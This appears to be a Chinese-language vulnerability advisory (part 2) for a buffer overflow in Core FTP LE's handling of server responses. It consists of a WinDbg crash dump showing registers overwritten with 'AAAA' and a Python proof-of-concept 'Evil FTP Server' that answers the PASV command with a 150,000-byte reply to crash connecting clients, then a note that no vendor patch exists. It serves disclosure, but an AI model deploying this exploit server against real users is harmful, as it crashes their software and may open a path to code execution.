Core FTP LE响应处理缓冲区溢出漏洞(2)

User mode write access violations that are not near NULL are exploitable.
 (b58.cf0): Access violation - code c0000005 (first chance)
 First chance exceptions are reported before any exception handling.
 This exception may be expected and handled.
 eax=00f1bbf0 ebx=41414141 ecx=00004141 edx=00c10608 esi=00f1bbe8 edi=41414141
 eip=7c919064 esp=0152d30c ebp=0152d528 iopl=0        nv up ei pl nz ac po nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000            efl=00010212
 ntdll!RtlDosSearchPath_Ustr+0x473:
 7c919064 8b0b            mov    ecx,dword ptr [ebx]  ds:0023:41414141=????????
 0:002> dd eax
 00f1bbf0  41414141 41414141 41414141 41414141
 00f1bc00  41414141 41414141 41414141 41414141
 00f1bc10  41414141 41414141 41414141 41414141
 00f1bc20  41414141 41414141 41414141 41414141
 00f1bc30  41414141 41414141 41414141 41414141
 00f1bc40  41414141 41414141 41414141 41414141
 00f1bc50  41414141 41414141 41414141 41414141
 00f1bc60  41414141 41414141 41414141 41414141
 0:002> dd esi
 00f1bbe8  41414141 41414141 41414141 41414141
 00f1bbf8  41414141 41414141 41414141 41414141
 00f1bc08  41414141 41414141 41414141 41414141
 00f1bc18  41414141 41414141 41414141 41414141
 00f1bc28  41414141 41414141 41414141 41414141
 00f1bc38  41414141 41414141 41414141 41414141
 00f1bc48  41414141 41414141 41414141 41414141
 00f1bc58  41414141 41414141 41414141 41414141
 '''

#!/usr/bin/python

from socket import *

host = "0.0.0.0"
 port = 21
 payload = "A" * 150000

s = socket(AF_INET, SOCK_STREAM)
 s.bind((host, 21))
 s.listen(1)

print "[+] Evil FTP Server started"
 print "[+] Listening on port %d..." % port

conn, addr = s.accept()
 print "[+] Connection accepted from %s" % addr[0]
 conn.send("220 Welcome to Evil FTP Server\r\n")
 conn.recv(1024)  # Receive USER
 conn.send("331 Need password for whatever user\r\n")
 conn.recv(1024)  # Receive PASS
 conn.send("230 User logged in\r\n")
 conn.recv(1024)  # Receive SYST
 conn.send("215 UNIX Type: L8\r\n")
 conn.recv(1024)  # Receive PWD
 conn.send("257 \"/\" is current directory\r\n")

try:
  print "[+] Sending evil response for 'PASV' command..."
  conn.recv(1024)  # Receive PASV
  conn.send("227 "+payload+"\r\n")
  conn.recv(1024)
 except error as e:
  if e.errno == 10054:
    print "[+] Client crashed!"
  else:
    print e
 finally:
  conn.close()
  s.close()

建议：
--------------------------------------------------------------------------------
厂商补丁：
 
Core FTP
 --------
 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：